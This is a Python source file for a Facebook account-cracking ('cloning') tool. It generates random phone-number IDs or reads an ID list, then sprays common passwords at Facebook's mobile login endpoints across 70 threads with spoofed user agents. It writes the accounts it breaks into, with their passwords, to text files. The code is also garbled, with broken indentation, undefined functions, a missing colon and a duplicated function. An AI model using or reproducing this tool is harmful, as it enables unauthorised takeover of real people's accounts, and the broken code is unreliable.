#coding=utf
import uuid
import os,sys,time,json,random,re,string,platform,base64
try:
    import requests
    from concurrent.futures import ThreadPoolExecutor as ThreadPool
    import mechanize
    from requests.exceptions import ConnectionError
except ModuleNotFoundError:
    os.system('pip install mechanize requests futures==2 > /dev/null')
    os.system('python run.py')
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m'    # WARNA MATI
A = '\x1b[1;90m' # WARNA ABU ABU
BN = '\x1b[1;107m' # BELAKANG PUTIH
BBL = '\x1b[1;106m' # BELAKANG BIRU LANGIT
BP = '\x1b[1;105m' # BELAKANG PINK
BB = '\x1b[1;104m' # BELAKANG BIRU
BK = '\x1b[1;103m' # BELAKANG KUNING
BH = '\x1b[1;102m' # BELAKANG HIJAU
BM = '\x1b[1;101m' # BELAJANG MERAH
BA = '\x1b[1;100m' # BELAKANG ABU ABU
my_color = [
 P, M, H, K, B, U, O, N]
warna = random.choice(my_color)

ugen2=[]
ugen=[]

for xd in range(5000):
	aa='Mozilla/5.0 (Linux; U; Android'
	b=random.choice(['3','4','5','6','7','8','9','10','11','12','13','14','15','16','17'])
	c=' en-us; GT-'
	d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
	e=random.randrange(1, 999)
	f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
	g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
	h=random.randrange(73,100)
	i='0'
	j=random.randrange(4200,4900)
	k=random.randrange(40,150)
	l='Mobile Safari/537.36'
	uaku2=(f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}')
	ugen.append(uaku2)

for xd in range(10000):
	a='Mozilla/5.0 (Symbian/3; Series60/'
	b=random.randrange(1, 9)
	c=random.randrange(1, 9)
	d='Nokia'
	e=random.randrange(100, 9999)
	f='/110.021.0028; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/'
	g=random.randrange(1, 9)
	h=random.randrange(1, 4)
	i=random.randrange(1, 4)
	j=random.randrange(1, 4)
	k='Mobile Safari/535.1'
	uaku=(f'{a}{b}.{c} {d}{e}{f}{g}.{h}.{i}.{j} {k}')
	ugen.append(uaku)


	aa='Mozilla/5.0 (Linux; U; Android'
	b=random.choice(['6','7','8','9','10','11','12'])
	c=' en-us; GT-'
	d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
	e=random.randrange(1, 999)
	f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
	g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
	h=random.randrange(73,100)
	i='0'
	j=random.randrange(4200,4900)
	k=random.randrange(40,150)
	l='Mobile Safari/537.36'
	uaku2=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
	ugen.append(uaku2)

logo ="""
'\33[1;34m   ###    ##     ##    ###   \033[1;37mN
'\33[1;91m  ## ##    ##   ##    ## ##   
'\33[1;35m ##   ##    ## ##    ##   ## \033[1;91mO
'\33[1;34m##     ##    ###    ##     ## 
'\33[1;33m#########   ## ##   #########\033[1;31m0
'\33[1;91m##     ##  ##   ##  ##     ## 
'\33[1;97m##     ## ##     ## ##     ##\033[1;34mB
[+]==============================================
[+]  Author    : \033[1;32mADIL TARIQ
[+]  GITHUB    : adiltoor27
[+]  TOOL TYPE : FREE
[+]  FACEBOOK  : ADIL TARIQ 
[+]  VERSION   : \033[1;31m0.0.1
[+]=============================================="""
        \33[1;32mRTEAM-AXA NEW UPDATE 
def lines():
	print('\33[1;37m----------------------------------------------')
 
loop = 0
oks = []
cps = []

def adil():
	os.system('clear')
	print(logo)
	print('[1] Pak Random Cloning menu')
        print('[2] file Cloning menu')
	print('\x1b[1;91m[3] Exit Main menu')
	print('\33[1;37m----------------------------------------------')
	riaz1 = input('[•] Select option  : ')
	if adil =='1':
		aqil()
        if adil =='2':
		file()

	if adil =='3':
		adil()
	else:
		print('\n\033[1;31mCHOOSE VAILD OPTION\033[0;97m')
		adil()
def file():
                          os.system('clear')
				print(logo)
				
				linex()
				print(' Example : /sdcard/AXA.txt')
				linex()
				file = input(' Put file path\033[1;37m: ')
				try:
					fo = open(file,'r').read().splitlines()
				except FileNotFoundError:
					print(' File location not found ')
					time.sleep(1)
					adil()
				os.system('clear')
				print(logo)
				print('[1] FILE METHOD\x1b[1;92m [1] \n\x1b[1;97m[2] File Method \x1b[1;92m[2]')
				linex()
				mthd=input(' Choose: ')
				linex()
				plist = []
				try:
					os.system('clear')
					print(logo)
					print('HOW MANY PASSWORD DO YOU WANT ADD')
					linex()
					ps_limit = int(input(' PUT PASSWORD : '))
				except:
					ps_limit =1
				os.system('clear')
				print(logo)
				print(' Example : first last,firstlast,first12345,***Etc')
				linex()
				for i in range(ps_limit):
					plist.append(input(f' Put password {i+1}: '))
                                        os.system("clear")
	                                print(logo)
	                                print("[+]==============================================")
	                                print("[+] DO YOU WANT SHOW ACTIVE APPS ")
	                                print("[+]==============================================")
                                	axalovesyou = input("[+] [CHOOSE] :- ")
                                	if axalovesyou in ['y','Y','1','yes','YES','Yes']:
		                        axa_xd.append('y')
                                	else:
		                        axa_xd.append('n')
					os.system('clear')
					print(logo)
					total_ids = str(len(fo))
					print(' Total Acounts   : '+total_ids)
					print(' Selected Method : \x1b[1;92mM '+mthd)
					print(' \x1b[1;91mIf you no result use flight mode')
                                        print(' [•]  \33[0;41mPROUD TO BE MUSLIM\33[0m')
					linex()
					for user in fo:
						ids,names = user.split('|')
						passlist = plist
						if mthd in ['1','01']:
							crack_submit.submit(ffb,ids,names,passlist)
						elif mthd in ['2','02']:
							crack_submit.submit(mmm,ids,names,passlist)
						else:
							crack_submit.submit(api,ids,names,passlist)
				print('\033[1;37m')
				linex()
				print(' The process has completed')
				print(' Total OK/CP: '+str(len(oks))+'/'+str(len(cps)))
				linex()
				input(' Press enter to back ')
				os.system('python axi.py') 
		
def rcrack(uid,pwx,tl):
    #print(user)
    global loop
    global cps
    global oks
    global proxy
    try:
        for ps in pwx:
            pro = random.choice(ugen)
            session = requests.Session()
            free_fb = session.get('https://p.facebook.com').text
            log_data = {
                "lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
            "jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
            "m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
            "li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
            "try_number":"0",
            "unrecognized_tries":"0",
            "email":uid,
            "pass":ps,
            "login":"Log In"}
             header_freefb = {'authority': 'p.facebook.com',
            'method': 'POST',
            'scheme': 'https',
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'accept-language': 'en-US,en;q=0.9',
            'cache-control': 'max-age=0',
            'sec-ch-ua': '"Chromium";v="107", "Not=A?Brand";v="24"',
            'sec-ch-ua-mobile': '?1',
            'sec-ch-ua-platform': '"Android"',
            'sec-fetch-dest': 'document',
            'sec-fetch-mode': 'navigate',
            'sec-fetch-site': 'none',
            'sec-fetch-user': '?1',
            'upgrade-insecure-requests': '1',
            'user-agent': pro}
            lo = session.post('https://p.facebook.com/login/device-based/regular/login/?refsrc',data=log_data,headers=header_freefb).text
            log_cookies=session.cookies.get_dict().keys()
            #print(iid+'|'+pws+'|'+str(log_cookies))
            if 'c_user' in log_cookies:
				coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
				cid = coki[151:166]
				print('\33[1;92m[AXA-OK] '+cid+' | '+ps+'\33[0;97m')
				if 'y' in axa_xd
					cek_apk(session,coki)
				else:
					break
				open('/sdcard/AXA-OK.txt', 'a').write(cid+' | '+ps+'\n')
				oks.append(cid)
				break
			elif 'checkpoint' in log_cookies:
				coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
				cid = coki[141:156]
				if 'y' in baby:
					print('\33[1;91m[AXA-CP] '+cid+' | '+ps+'\33[0;97m')
					open('/sdcard/AXA-CP.txt', 'a').write(cid+' | '+ps+'\n')
					cps.append(cid)
					break
				else:
                continue
        loop+=1
        sys.stdout.write(f'\r[\033[1;97mAXA-NOOB\033[1;97m] %s|\33[1;32mOK:- %s \r'%(loop,len(oks))),
        sys.stdout.flush()
    except:
        pass

def aqil():
    os.system('clear')
    print(logo)
    print('[1] Random Method \x1b[1;97m1')
    print('\x1b[1;92m[2] Random Method \x1b[1;97m2')
    print('\x1b[1;92m[3] Random Method \x1b[1;97m3')
    print('\x1b[1;91m[4] Go to main menu')
    lines()
    adil1 = input('[+] CHOOSE optION : ')
    if adil1 =='1':
    	m1()
    if adil1 =='2':
    	m2()
    if adil1 =='3':
    	m3()
    if adil1 =='4':
    	adil()
    else:
        print('\n\033[1;37m[+] SELECT VALID optION\033[0;97m')        
#
def aqil1():
	os.system('clear')
	print(logo)
	print('\x1b[1;92m[1]METHOD 1')
	print('\x1b[1;92m[2] METHOD 2')
	print('\x1b[1;91m[3] main menu')
	lines()
	adil1 = input('[+] CHOOSE OPTION : ')
	if adil1 =='1':
		b1()
	if adil1 =='2':
		b2()
	if adil1 =='3':
		adil()
#def choice()
#

def m1():
    user=[]
    os.system('clear')
    print(logo)
    print('[+] PUT YOUR COUNTRY CODE')
    lines()
    kode = input('[+] YOUR CODE : ')
    lines()
    os.system('clear')
    print(logo)
    print('[+] INPUT YOUR IDZ LIMIT DO YOU WANT CRACK')
    lines()
    limit = int(input('[+] IDZ LIMI T : '))
    print(46*'-')
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(7))
        user.append(nmp)
    with ThreadPool(max_workers=70) as yaari:
        os.system('clear')
        print(logo)
        tl = str(len(user))
        print(' Total Acounts : '+tl)
        print(' Selected Code :\x1b[1;92m '+kode)
        print('\x1b[1;91m PROUD TO BE MUSLIM ')
        lines()
        for guru in user:
            uid = kode+guru
            pwx=[guru,'khanmalik','malik1122','iloveyou','ali110','786786','freefire']            
            yaari.submit(rcrack,uid,pwx,tl)
    print(46*'-')
    print('IDZ SAVED IN OK.txt : CP.txt')
    print(46*'-')
    print('The Process Has Been Complete')
    print('Press Enter to Back');adil()
#
def m2():
    user=[]
    os.system('clear')
    print(logo)
    print('[+] PUT YOUR COUNTRY CODE')
    lines()
    kode = input('[+] YOUR CODE : ')
    lines()
    os.system('clear')
    print(logo)
    print('[+] INPUT YOUR IDZ LIMIT DO YOU WANT TO CRACK ')
    lines()
    limit = int(input('[+] IDZ LIMIT : '))
    print(46*'-')
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(7))
        user.append(nmp)
    with ThreadPool(max_workers=70) as yaari:
        os.system('clear')
        print(logo)
        tl = str(len(user))
        print(' Total Acounts : '+tl)
        print(' Selected Code :\x1b[1;92m '+kode)
        print('\x1b[1;91m PROUD TO BE MUSLIM')
        lines()
        for guru in user:
            uid = kode+guru
            pwx=[guru,'khankhan','khan12345','khan12','khan786','786786','aliali']
            yaari.submit(rcrack,uid,pwx,tl)
    print(46*'-')
    print('IDZ SAVED IN OK.txt : CP.txt')
    print(46*'-')
    print('The Process Has Been Complete')
    print('Press Enter to Back');adil()
#
def m3():
      user=[]
    os.system('clear')
    print(logo)
    print('[+] PUT YOUR COUNTRY CODE')
    lines()
    kode = input('[+] YOUR CODE : ')
    lines()
    os.system('clear')
    print(logo)
    print('[+] INPUT YOUR IDZ LIMIT DO YOU WANT TO CRACK ')
    lines()
    limit = int(input('[+] IDZ LIMIT : '))
    print(46*'-')
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(7))
        user.append(nmp)
    with ThreadPool(max_workers=70) as yaari:
        os.system('clear')
        print(logo)
        tl = str(len(user))
        print(' Total Acounts : '+tl)
        print(' Selected Code :\x1b[1;92m '+kode)
        print('\x1b[1;91m PROUD TO BE MUSLIM')
        lines()
        lines()
        for guru in user:
            uid = kode+guru
            pwx=[guru,'khankhan','khan12345','khan12','khan786','786786','aliali']
            yaari.submit(rcrack,uid,pwx,tl)
    print(46*'-')
    print('IDZ SAVED IN OK.txt : CP.txt')
    print(46*'-')
    print('The Process Has Been Complete')
    print('Press Enter to Back');adil()
#


	
def rcrack(uid,pwx,tl):
    #print(user)
    global loop
    global cps
    global oks
    global proxy
    try:
        for ps in pwx:
            pro = random.choice(ugen)
            session = requests.Session()
            free_fb = session.get('https://m.facebook.com').text
            log_data = {
                "lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
            "jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
            "m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
            "li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
            "try_number":"0",
            "unrecognized_tries":"0",
            "email":uid,
            "pass":ps,
            "login":"Log In"}
            header_freefb = {'authority': 'm.facebook.com',
            'method': 'POST',
            'scheme': 'https',
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'accept-language': 'en-US,en;q=0.9',
            'cache-control': 'max-age=0',
            'sec-ch-ua': '"Chromium";v="107", "Not=A?Brand";v="24"',
            'sec-ch-ua-mobile': '?1',
            'sec-ch-ua-platform': '"Android"',
            'sec-fetch-dest': 'document',
            'sec-fetch-mode': 'navigate',
            'sec-fetch-site': 'none',
            'sec-fetch-user': '?1',
            'upgrade-insecure-requests': '1',
            'user-agent': pro}
            lo = session.post('https://m.facebook.com/login/device-based/regular/login/?refsrc',data=log_data,headers=header_freefb).text
            log_cookies=session.cookies.get_dict().keys()
            #print(iid+'|'+pws+'|'+str(log_cookies))
            if 'c_user' in log_cookies:
                coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
                cid = coki[151:166]
                print('\033[1;32m[AXA-OK] '+cid+'|'+ps+'\033[0;97m')
                open('AXA-OK.txt', 'a').write(cid+' | '+ps+ '\n')
                oks.append(cid)
                break
            elif 'checkpoint' in log_cookies:
                coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
                cid = coki[141:152]
                print('\033[1;31m[AXA-CP] '+cid+' | '+ps+'\x1b[1;97m')
                open('AXA-CP.txt', 'a').write(uid+' | '+ps+'\n')
                cps.append(cid)
                break
            else:
                continue
        loop+=1
        sys.stdout.write(f'\r[\033[1;97mAXA\033[1;97m] %s|\33[1;32mOK:- %s \r'%(loop,len(oks))),
        sys.stdout.flush()
    except:
        pass


adil()
